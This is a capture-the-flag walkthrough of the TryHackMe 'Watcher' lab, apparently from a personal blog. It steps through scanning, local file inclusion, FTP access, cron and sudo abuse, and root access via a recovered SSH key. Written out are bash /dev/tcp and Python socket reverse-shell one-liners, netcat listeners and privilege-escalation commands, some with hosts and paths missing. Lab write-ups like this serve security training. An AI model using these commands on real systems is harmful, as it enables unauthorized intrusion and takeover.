TryHackMe: Watcher

Al1z4deh:~# echo "Welcome"
6 min readMar 21, 2022


Today we will take a look at TryHackMe: Watcher. My goal in sharing this writeup is to show you the way if you are in trouble. Please try to understand each step and take notes. Good luck


  • Network scan

Nmap (“Network Mapper” is a network scanner)

Command: sudo nmap -sS -sC -sV -oN nmap/initial

  • URL discovery

Gobuster ( Gobuster is a tool used to brute-force URIs including directories and files)

Command: gobuster dir -u -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .txt,.php,.html

> Now let’s look at the tasks

Task 1: Flag 1

> Let’s check the directories we found

We found the direction of Flag 1

Task 2 : Flag 2

> When we look at the product page, we see that we have found LFI(Local File inclusion).

> Let’s note the usernames we found

> Check in the previous directory.

> Here is the username and password for ftp. We even found ftp directories. > Let’s check now

Command: sudo ftp $IP

> Here we found flag 2

Task 3: Flag 3

> Use the /files folder here to get the reverse shell.

> Listening with Netcat (utility program supports a wide range of commands to manage networks and monitor the flow of traffic data between systems.)

Command: nc -nvlp 1234

> Spawning a TTY Shell

Command: script /dev/null -c bash

> To find Flag 3

Command: find 2>/dev/null | grep flag_3.txt

> Here we found flag 3

Task 4: Flag 4

> The sudo -l (list) option will list the allowed (and forbidden) commands for the invoking user

Command: sudo -l

> We have the authority to make the transition to Toby.

Command: sudo -u toby /bin/bash

> Here we found flag 4

Task 5: Flag 5

> Looking at the Jobs file, I found a shell script that you can execute on the terminal.

> I quickly check the crontab ( configuration file that specifies shell commands to run periodically on a given schedule.) and was not mistaken.

> Mat automatically launches this file from time to time

> Then let’s abuse it with a small reverse shell script

Command: echo “bash -i >& /dev/tcp/ 0>&1” >>

> Let’s listen

Command: nc -nvlp 4242

> Here we found flag 5

Task 6: Flag 6

> Check list the allowed commands

Command: sudo -l

> We can run code written in python as Will.

> Let’s check the code and understand how it works

> If we select the “2” command, it must provide id information. Let’s check

> Everything is clear. Let’s take advantage of it

Note: Python programming language will be very useful for us in this way. If you find it difficult and confusing, you can learn everything easily and practically from the site I will recommend to you. I am currently studying on too.

> Now let’s get a python reverse shell script that can use the site I mentioned.

> Let’s add.

Command: echo ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“”,5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);[“/bin/sh”,”-i”])’ >

> And listen

Command: nc -nvlp 5555

> Spawning a TTY Shell and check folder

> Here we found flag 6

Task 7: Flag 7

> When we write id, we see that Will belongs to another group.

Command: id

> It’s time to root.

> Let’s use Linpeas (Linux local Privilege Escalation Awesome Script (linPEAS) is a script that search for possible paths to escalate privileges on Linux/Unix)

Command: chmod +x

Command: ./

> Our attention is drawn to the file encrypted with base64. Let’s check.

> Let’s decrypt

> That’s rsa key.(RSA key is a private key based on RSA algorithm. Private Key is used for authentication and a symmetric key exchange during establishment of an SSL/TLS)

> Let’s connect to root .

Command: ssh root@IP -i root

> And now we are the root

> Here we found flag 7

“If you have any questions or comments, please do not hesitate to write. Have a good days”



Al1z4deh:~# echo "Welcome"

Al1z4deh:~# echo "eJPT, CEH, OSCP"